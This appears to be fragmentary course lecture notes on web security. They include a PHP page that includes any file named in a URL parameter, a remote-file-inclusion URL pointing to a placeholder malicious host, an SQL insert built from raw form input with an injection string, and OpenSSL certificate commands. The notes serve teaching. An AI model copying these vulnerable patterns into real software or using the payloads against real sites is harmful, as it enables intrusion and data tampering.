CS174
Chris Pollett
Nov. 10, 2010
Which of the following statements is true?
<html><head>...</head> <body> <div id="leftcolumn"> <ul><li><a href="?c=n.html">News</a></li> <li><a href="?c=d.html">Discussions</a></li></ul> </div> <div id="content"> <?php if(isset($_GET['c'])){include($_GET['c']);} else {include("default.php");} ?> </div></body></html>
http://somewhere.com/?c=http://www.mymalicioussite.com/evilscript.php
$sql = "INSERT INTO users (reg_username, reg_password, reg_email) VALUES ('{$_POST['reg_username']}', $_POST[ '$reg_password'], '{$_POST['reg_email']}')";
bad_guy', 'mypass', ''), ('good_guy?
LoadModule ssl_module libexec/apache2/mod_ssl.so
server.key and server.crt
openssl genrsa -des3 -out server.key 1024
openssl req -new -key server.key -out server.csr
openssl x509 -req -days 365 -in server.csr -signkey server.key -out server.crt(